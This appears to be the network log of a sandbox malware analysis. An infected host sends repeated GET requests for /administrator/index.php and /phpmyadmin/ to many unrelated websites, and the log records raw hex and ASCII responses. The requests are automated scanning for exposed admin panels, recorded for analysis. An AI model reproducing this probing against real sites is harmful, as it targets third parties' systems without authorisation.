Feb 21, 2024 00:26:07.192737103 CET	1286	IN	Data Raw: 72 65 20 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 30 2e 35 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 30 2e 35 73 3b 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 6b 2d 63 69 72 63 6c Data Ascii: re {-webkit-animation-delay: -0.5s;animation-delay: -0.5s; } .sk-circle .sk-circle9:before {-webkit-animation-delay: -0.4s;animation-delay: -0.4s; } .sk-circle .sk-circle10:before {-webkit-animation-delay: -0.3s;animati
Feb 21, 2024 00:26:07.192745924 CET	1286	IN	Data Raw: 20 20 20 7d 2c 20 31 30 30 30 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 62 72 6f 77 73 65 72 49 6e 74 65 67 72 69 74 79 43 68 65 63 6b 28 29 20 7b 0a 20 20 20 20 20 20 20 20 Data Ascii: }, 1000); } function browserIntegrityCheck() { w = window.innerWidth; h = window.innerHeight; arr = [w, h, Math.floor((Math.random() * 9) + 1)]; arr.pus
Feb 21, 2024 00:26:07.192758083 CET	1286	IN	Data Raw: 74 72 69 6e 67 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 74 65 78 74 20 3d 20 22 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 70 6f 73 73 69 62 6c 65 20 3d 20 22 41 42 43 44 45 46 47 48 49 Data Ascii: tring() { var text = ""; var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; for (var i = 0; i < 5; i++) text += possible.charAt(Math.floor(Math.
Feb 21, 2024 00:26:07.192774057 CET	1286	IN	Data Raw: 22 63 65 6e 74 65 72 22 20 76 61 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6e 6f 73 63 72 Data Ascii: "center" valign="middle"> <div> <noscript> <h1 style="color:#990000;">Please, turn Javascript on in your browser then reload the page.</h1> </noscript>
Feb 21, 2024 00:26:07.192805052 CET	1286	IN	Data Raw: 20 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 69 6e 67 20 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 69 6e 64 65 78 2e 70 68 70 20 73 65 63 75 72 65 6c 79 e2 80 a6 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: <h1>Accessing /administrator/index.php securely</h1> <span>This is an automatic process. Your browser will redirect to your requested content in <span id="seconds">5</span> seconds.</span>
Feb 21, 2024 00:26:07.192876101 CET	1286	IN	Data Raw: 68 69 73 20 63 6f 6e 74 61 63 74 20 66 6f 72 6d 20 69 73 20 61 62 6f 75 74 20 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 63 6f 6d 5f 61 63 61 6a 6f 6f 6d 2f 20 3c 2f 61 3e 3c 62 72 3e 0a 3c 61 20 68 72 65 66 3d 27 69 6e 64 65 78 2e 70 68 70 3f 6f 70 74 Data Ascii: his contact form is about /components/com_acajoom/ </a><br><a href='index.php?option=com_content'>This contact form is about /components/com_content/ </a><br><a href='index.php?option=com_phocagallery'>This contact form is about /components/
Feb 21, 2024 00:26:07.192884922 CET	1286	IN	Data Raw: 2e 70 68 70 3f 6f 70 74 69 6f 6e 3d 46 43 4b 65 64 69 74 6f 72 20 2d 20 55 70 6c 6f 61 64 65 72 73 20 54 65 73 74 73 27 3e 54 68 69 73 20 63 6f 6e 74 61 63 74 20 66 6f 72 6d 20 69 73 20 61 62 6f 75 74 20 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 46 43 Data Ascii: .php?option=FCKeditor - Uploaders Tests'>This contact form is about /components/FCKeditor - Uploaders Tests/ </a><br><a href='index.php?option=phpmyadmin'>This contact form is about /components/phpmyadmin/ </a><br><a href='index.php?option=p
Feb 21, 2024 00:26:07.192917109 CET	1104	IN	Data Raw: 6e 61 74 75 72 65 20 23 31 30 31 33 20 28 26 71 75 6f 74 3b 53 71 75 69 72 72 65 6c 4d 61 69 6c 20 76 65 72 73 69 6f 6e 20 31 2e 34 2e 34 26 71 75 6f 74 3b 20 69 6e 75 72 6c 3a 73 72 63 20 65 78 74 3a 70 68 70 29 3c 2f 61 3e 20 3c 62 72 3e 3c 62 Data Ascii: nature #1013 ("SquirrelMail version 1.4.4" inurl:src ext:php)</a> <br><br><a href="/demo/?GHH v1.1 - WebUtil 2.7">GHDB Signature #1013 ("SquirrelMail version 1.4.4" inurl:src ext:php)</a> <br><br><a href="/demo/?GHH v1.1

Session ID	Source IP	Source Port	Destination IP	Destination Port
78	192.168.2.6	54337	103.224.182.253	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:07.065433979 CET	266	OUT	GET /administrator/index.php HTTP/1.1 Host: hotmail.fr.au Accept: / Accept-Encoding: deflate, gzip Cookie: __tad=1708471566.1447398 User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://hotmail.fr.au/administrator/
Feb 21, 2024 00:26:07.262708902 CET	336	IN	HTTP/1.1 200 OK date: Tue, 20 Feb 2024 23:26:07 GMT server: Apache vary: Accept-Encoding content-encoding: gzip content-length: 137 content-type: text/html; charset=UTF-8 connection: close Data Raw: 1f 8b 08 00 00 00 00 00 00 03 25 8e 41 12 c2 30 0c 03 cf f8 15 26 9c 43 78 80 9b 03 3f 71 db 94 16 02 e9 04 c3 d0 df e3 c6 3a 49 9e d1 5a 34 cb 33 47 00 9a 13 8f 11 48 16 c9 29 4e f5 cc 1f 0a 16 80 de 43 5d 56 41 d9 d6 d4 39 49 3f 09 77 fe b2 5d 9d 96 81 82 05 f3 86 52 d7 97 71 c3 fe 36 94 5c 6a e7 4e 53 93 c3 9d a0 f1 d2 a4 fd 03 1d bd c7 6b e6 d7 03 d1 7b 7d 18 f6 66 6c 2c 9b 07 7f 28 5c 82 ab a8 00 00 00 Data Ascii: %A0&Cx?q:IZ43GH)NC]VA9I?w]Rq6\jNSk{}fl,(\

Session ID	Source IP	Source Port	Destination IP	Destination Port
79	192.168.2.6	54338	103.224.182.253	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:07.065764904 CET	266	OUT	GET /administrator/index.php HTTP/1.1 Host: hotmail.fr.au Accept: / Accept-Encoding: deflate, gzip Cookie: __tad=1708471566.1141811 User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://hotmail.fr.au/administrator/
Feb 21, 2024 00:26:07.262748003 CET	336	IN	HTTP/1.1 200 OK date: Tue, 20 Feb 2024 23:26:07 GMT server: Apache vary: Accept-Encoding content-encoding: gzip content-length: 137 content-type: text/html; charset=UTF-8 connection: close Data Raw: 1f 8b 08 00 00 00 00 00 00 03 25 8e 41 12 c2 30 0c 03 cf f8 15 26 9c 43 78 80 9b 03 3f 71 db 94 16 02 e9 04 c3 d0 df e3 c6 3a 49 9e d1 5a 34 cb 33 47 00 9a 13 8f 11 48 16 c9 29 4e f5 cc 1f 0a 16 80 de 43 5d 56 41 d9 d6 d4 39 49 3f 09 77 fe b2 5d 9d 96 81 82 05 f3 86 52 d7 97 71 c3 fe 36 94 5c 6a e7 4e 53 93 c3 9d a0 f1 d2 a4 fd 03 1d bd c7 6b e6 d7 03 d1 7b 7d 18 f6 66 6c 2c 9b 07 7f 28 5c 82 ab a8 00 00 00 Data Ascii: %A0&Cx?q:IZ43GH)NC]VA9I?w]Rq6\jNSk{}fl,(\

Session ID	Source IP	Source Port	Destination IP	Destination Port
80	192.168.2.6	54339	217.70.184.38	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:07.072700977 CET	248	OUT	GET /administrator/index.php HTTP/1.1 Host: network-abilities.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://network-abilities.com/administrator/
Feb 21, 2024 00:26:07.235014915 CET	1167	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 20 Feb 2024 23:26:07 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Vary: Accept-Language Content-Encoding: gzip Data Raw: 33 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 55 cd 72 db 36 10 be e7 29 50 5e 9c 4c 46 a4 29 d9 b1 d4 a1 98 49 ed 5a 4e 2b 8f 5c 3b b5 27 ba 68 40 70 45 c2 02 01 06 00 45 d1 a7 bc 46 5f af 4f d2 e5 8f 52 39 96 a6 9d f6 02 81 c0 b7 bb d8 6f bf 5d 05 3f 5c cc ce 3f 7d be f9 99 a4 36 13 e1 ab a0 fe 21 4c 50 63 c6 8e 54 bd 47 e3 10 41 65 32 06 19 be 22 24 48 81 c6 f5 06 b7 19 58 4a 58 4a b5 01 3b 76 0a bb ec 0d 9d dd 2b 49 33 18 3b 6b 0e 65 ae b4 75 08 53 d2 82 44 68 c9 63 9b 8e 63 58 73 06 bd e6 63 8f 5d 0c 86 69 9e 5b ae e4 8e e9 a7 94 1b 12 ab 8c 72 d9 e0 48 4a 0d 89 00 24 d1 90 70 63 41 43 4c 4a 6e 53 32 a1 32 e6 ae 04 eb 92 8f 96 a0 15 2b b4 46 1f a2 22 39 d5 2b 84 45 15 b1 29 10 55 4a d0 ee f6 05 96 5b 01 21 9a 95 4a af 7a 34 e2 82 5b 0e c6 65 2a 0b bc f6 b2 05 0a 2e 57 18 54 8c 1d 63 2b 01 26 05 c0 1c 6d 95 e3 db 2d 6c ac c7 0c 52 97 6a 58 8e 9d fa b9 bd b3 e1 f0 e4 64 70 7a ec d6 17 2f 9d a4 c8 11 2b f0 a5 ac 4e b8 b5 5b d2 75 fd e9 e2 b2 75 cd 33 9a 80 b7 e9 35 30 ef 85 9b 1c 57 45 63 87 50 2c df 12 59 fb e6 0a f7 c6 bb ae 57 d0 9a da de 2d 24 85 a0 da 2d d5 72 d9 df 7a af 51 5e 77 c2 b4 32 46 69 9e 70 f9 7f e2 dc 41 c6 7f 52 22 fe f7 81 02 6f 2b b2 20 52 71 d5 c5 8e f9 7a 2b cb 1b ac 1f 97 c9 0d 32 b1 e8 1f f7 07 3d ad 94 5d f4 e3 bc 30 c4 09 83 46 1c 1d 74 26 e2 3b 4b 2d 67 3b 40 ff c3 a4 f2 49 e7 64 e7 fc 4b 7a fd 5b 1f ed 31 52 18 50 8d 46 02 be 0b d9 a2 3b 35 2e 7c fd 61 78 86 06 a9 7f 20 5c a3 97 85 3f 60 f0 ab 13 fe 07 e9 22 13 7e b8 9b f9 f7 fe 51 67 8b c1 99 fc 32 7b 9e 4e 73 ee ff 32 af 50 68 41 8e c9 74 c5 49 ad cd cd 8f 9e 57 a6 8a 1b 37 d9 86 f1 40 7a 1a 4c 21 ac 79 6f 80 6a 96 8e f7 36 00 3a 33 56 2b 99 84 f7 d8 d4 4d f3 3c 5c cd 3e de 91 ce 98 a8 25 39 d0 39 9d 5d e0 d1 90 58 45 12 b0 8d 79 4b c7 9f 5f ff 30 24 2f 22 c1 59 c7 05 0a 07 fb 9e 70 b9 54 3a 6b f6 6e e0 61 22 5e 53 9b 97 52 68 d3 ce 95 e1 35 36 52 9b 45 7f 96 4c 53 e7 30 56 15 48 78 03 7c f4 87 b6 a6 69 2f 2c 52 3a 6e 71 fe a4 8c 16 35 03 39 95 7b a1 f5 63 6b e0 c5 75 bc b4 7f 53 f5 0f 84 44 9a a0 e8 51 19 85 a4 6b ca 05 8d 04 e0 2d 06 09 77 32 6e d7 fd 4f ac 9b d2 9c a3 24 91 49 d0 0b 7f b4 f1 99 13 3e 50 69 49 a5 0a 5d cf b7 5d d9 bd c7 90 de 1e 49 94 e5 73 41 b4 26 4e 38 45 41 48 92 29 0d 84 46 c8 da 4e dd 5a 19 a3 d6 40 1a a4 dd 90 12 48 46 25 b6 65 5d e7 36 ce 41 ba a2 c2 5a 25 17 8f a7 53 ae b7 b4 2a c9 50 03 ab fa 1f 42 c6 aa 74 85 62 6d f1 35 e4 82 32 78 4d ad 8a 5e 1f d1 ab db 63 76 75 fd 6e 5a 8d 9e e8 64 54 4e b3 38 8d b2 db 7c 9a 9d 8a f8 7c 24 22 3e 5a 45 7d 3f a5 0f 27 6b 36 b8 97 f3 fe fd 53 7c 31 7a 8a 06 f7 d5 e7 fe ef 23 36 b9 ac 68 5f 14 f3 6a fe 34 7f b8 c4 b3 64 74 f4 86 bc 25 47 7b 8b 75 f4 c6 21 5a 09 9c 5a 35 d5 38 c1 f0 56 c6 b0 19 3b c7 4e 78 89 5b 42 9f 11 62 78 86 75 d4 b5 ce 0f 15 bf 2d ef 4e 95 bb 71 f3 ad de b5 b7 ee a3 99 88 ed 20 c4 79 d0 fc 49 ff 05 75 b4 23 94 b5 07 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 3aeUr6)P^LF)IZN+\;'h@pEEF_OR9o]?\?}6!LPcTGAe2"$HXJXJ;v+I3;keuSDhccXsc]i[rHJ$pcACLJnS22+F"9+E)UJ[!Jz4[e.WTc+&m-lRjXdpz/+N[uu350WEcP,YW-$-rzQ^w2FipAR"o+ Rqz+2=]0Ft&;K-g;@IdKz[1RPF;5.\|ax \?`"~Qg2{Ns2PhAtIW7@zL!yoj6:3V+M<\>%99]XEyK_0$/"YpT:kna"^SRh56RELS0VHx\|i/,R:nq59{ckuSDQk-w2nO$I>PiI]]IsA&N8EAH)FNZ@HF%e]6AZ%SPBtbm52xM^cvunZdTN8\|\|$">ZE}?'k6S\|1z#6h_j4dt%G{u!ZZ58V;Nx[Bbxu-Nq yIu#0

Session ID	Source IP	Source Port	Destination IP	Destination Port
81	192.168.2.6	54332	109.71.40.107	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:07.084882021 CET	232	OUT	GET /administrator/index.php HTTP/1.1 Host: cpsgroupe.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://cpsgroupe.com/administrator/
Feb 21, 2024 00:26:07.265197039 CET	1286	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:07 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Server: imunify360-webshield/1.21 Last-Modified: Tuesday, 20-Feb-2024 23:26:07 GMT Cache-Control: private, no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0, s-maxage=0 cf-edge-cache: no-cache Data Raw: 35 38 61 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 74 69 74 6c 65 3e 4f 6e 65 20 6d 6f 6d 65 6e 74 2c 20 70 6c 65 61 73 65 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 36 46 37 46 38 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 30 33 31 33 31 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 35 76 68 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 6c 65 61 73 65 20 77 61 69 74 20 77 68 69 6c 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 69 73 20 62 65 69 6e 67 20 76 65 72 69 66 69 65 64 2e 2e 2e 3c 2f 68 31 3e 0a 3c 66 6f 72 6d 20 69 64 3d 22 77 73 69 64 63 68 6b 2d 66 6f 72 6d 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 20 61 63 74 69 6f 6e 3d 22 2f 7a 30 66 37 36 61 31 64 31 34 66 64 32 31 61 38 66 62 35 66 64 30 64 30 33 65 30 66 64 63 33 64 33 63 65 64 61 65 35 32 66 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 77 73 69 64 63 68 6b 22 20 6e 61 6d 65 3d 22 77 73 69 64 63 68 6b 22 2f 3e 0a 3c 2f 66 6f 72 6d 3e 0a 3c 73 63 72 69 70 74 3e 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 76 61 72 20 77 65 73 74 3d 2b 28 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 65 61 73 74 3d 2b 28 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 Data Ascii: 58a<!doctype html><html><head><meta charset="utf-8"><meta name="robots" content="noindex, nofollow"><title>One moment, please...</title><style>body { background: #F6F7F8; color: #303131; font-family: sans-serif; margin-top: 45vh; text-align: center;}</style></head><body><h1>Please wait while your request is being verified...</h1><form id="wsidchk-form" style="display:none;" action="/z0f76a1d14fd21a8fb5fd0d03e0fdc3d3cedae52f" method="get"><input type="hidden" id="wsidchk" name="wsidchk"/></form><script>(function(){ var west=+((+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![])+(+!+[]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![])), east=+((+!+[]+!![]+!![]+!![]+!![])+(+!+[]+[])+(+!+[])+(+!+[]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!!
Feb 21, 2024 00:26:07.265203953 CET	479	IN	Data Raw: 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 29 2c 0a 20 20 20 20 20 Data Ascii: []+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])), x=function(){try{return !!window.addEventListener;}catch(e){return !!0;} }, y=function(y,z){x() ? document.addEventListener("DOMContentLoaded",y,z) :
Feb 21, 2024 00:26:07.265208960 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
82	192.168.2.6	54351	162.215.240.240	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:07.106869936 CET	246	OUT	GET /administrator/index.php HTTP/1.1 Host: wefttechnologies.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://wefttechnologies.com/administrator/
Feb 21, 2024 00:26:07.283490896 CET	226	IN	HTTP/1.1 409 Conflict Date: Tue, 20 Feb 2024 23:26:07 GMT Server: Apache Content-Length: 83 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 68 75 6d 61 6e 73 5f 32 31 39 30 39 3d 31 22 3b 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 74 72 75 65 29 3c 2f 73 63 72 69 70 74 3e Data Ascii: <script>document.cookie = "humans_21909=1"; document.location.reload(true)</script>

Session ID	Source IP	Source Port	Destination IP	Destination Port
83	192.168.2.6	54804	162.241.216.197	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:07.347980976 CET	256	OUT	GET /administrator/index.php HTTP/1.1 Host: wilsonfamilyinsurance.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://wilsonfamilyinsurance.com/administrator/
Feb 21, 2024 00:26:07.521161079 CET	226	IN	HTTP/1.1 409 Conflict Date: Tue, 20 Feb 2024 23:26:07 GMT Server: Apache Content-Length: 83 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 68 75 6d 61 6e 73 5f 32 31 39 30 39 3d 31 22 3b 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 74 72 75 65 29 3c 2f 73 63 72 69 70 74 3e Data Ascii: <script>document.cookie = "humans_21909=1"; document.location.reload(true)</script>

Session ID	Source IP	Source Port	Destination IP	Destination Port
84	192.168.2.6	54815	185.107.56.198	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:07.419114113 CET	276	OUT	GET /administrator/index.php HTTP/1.1 Host: att.com.ph Accept: / Accept-Encoding: deflate, gzip Cookie: sid=6bfceafb-d047-11ee-9fdb-b2ef13fb2d8a User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://att.com.ph/administrator/
Feb 21, 2024 00:26:07.982454062 CET	785	IN	HTTP/1.1 200 OK accept-ch: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile cache-control: max-age=0, private, must-revalidate connection: close content-length: 494 content-type: text/html; charset=utf-8 date: Tue, 20 Feb 2024 23:26:07 GMT server: nginx Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 68 74 74 70 3a 2f 2f 61 74 74 2e 63 6f 6d 2e 70 68 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 69 6e 64 65 78 2e 70 68 70 3f 63 68 3d 31 26 6a 73 3d 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 68 64 57 51 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 56 34 63 43 49 36 4d 54 63 77 4f 44 51 33 4f 44 63 32 4e 79 77 69 61 57 46 30 49 6a 6f 78 4e 7a 41 34 4e 44 63 78 4e 54 59 33 4c 43 4a 70 63 33 4d 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 70 7a 49 6a 6f 78 4c 43 4a 71 64 47 6b 69 4f 69 49 79 64 58 46 79 59 6d 78 73 63 44 68 70 61 6e 46 76 61 6e 42 32 64 44 41 77 5a 32 56 6f 62 33 59 69 4c 43 4a 75 59 6d 59 69 4f 6a 45 33 4d 44 67 30 4e 7a 45 31 4e 6a 63 73 49 6e 52 7a 49 6a 6f 78 4e 7a 41 34 4e 44 63 78 4e 54 59 33 4e 44 6b 79 4e 7a 67 32 66 51 2e 43 5a 4b 58 74 53 49 36 59 46 74 39 4f 72 46 41 63 75 49 6b 4a 73 6d 65 72 62 4b 5a 36 58 43 4d 5f 4a 5f 4c 70 75 6f 62 6a 62 4d 26 73 69 64 3d 36 62 66 63 65 61 66 62 2d 64 30 34 37 2d 31 31 65 65 2d 39 66 64 62 2d 62 32 65 66 31 33 66 62 32 64 38 61 27 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://att.com.ph/administrator/index.php?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTcwODQ3ODc2NywiaWF0IjoxNzA4NDcxNTY3LCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIydXFyYmxscDhpanFvanB2dDAwZ2Vob3YiLCJuYmYiOjE3MDg0NzE1NjcsInRzIjoxNzA4NDcxNTY3NDkyNzg2fQ.CZKXtSI6YFt9OrFAcuIkJsmerbKZ6XCM_J_LpuobjbM&sid=6bfceafb-d047-11ee-9fdb-b2ef13fb2d8a');</script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
85	192.168.2.6	55772	15.197.204.56	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:07.978682041 CET	171	OUT	GET /phpmyadmin/ HTTP/1.1 Host: att.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:08.074325085 CET	221	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:08 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://att.com.au/phpmyadmin/ ETag: "65d0dd59-0"
Feb 21, 2024 00:26:08.281291962 CET	221	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:08 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://att.com.au/phpmyadmin/ ETag: "65d0dd59-0"

Session ID	Source IP	Source Port	Destination IP	Destination Port
86	192.168.2.6	55771	45.136.114.149	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:07.994493961 CET	177	OUT	GET /phpmyadmin/ HTTP/1.1 Host: archononline.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
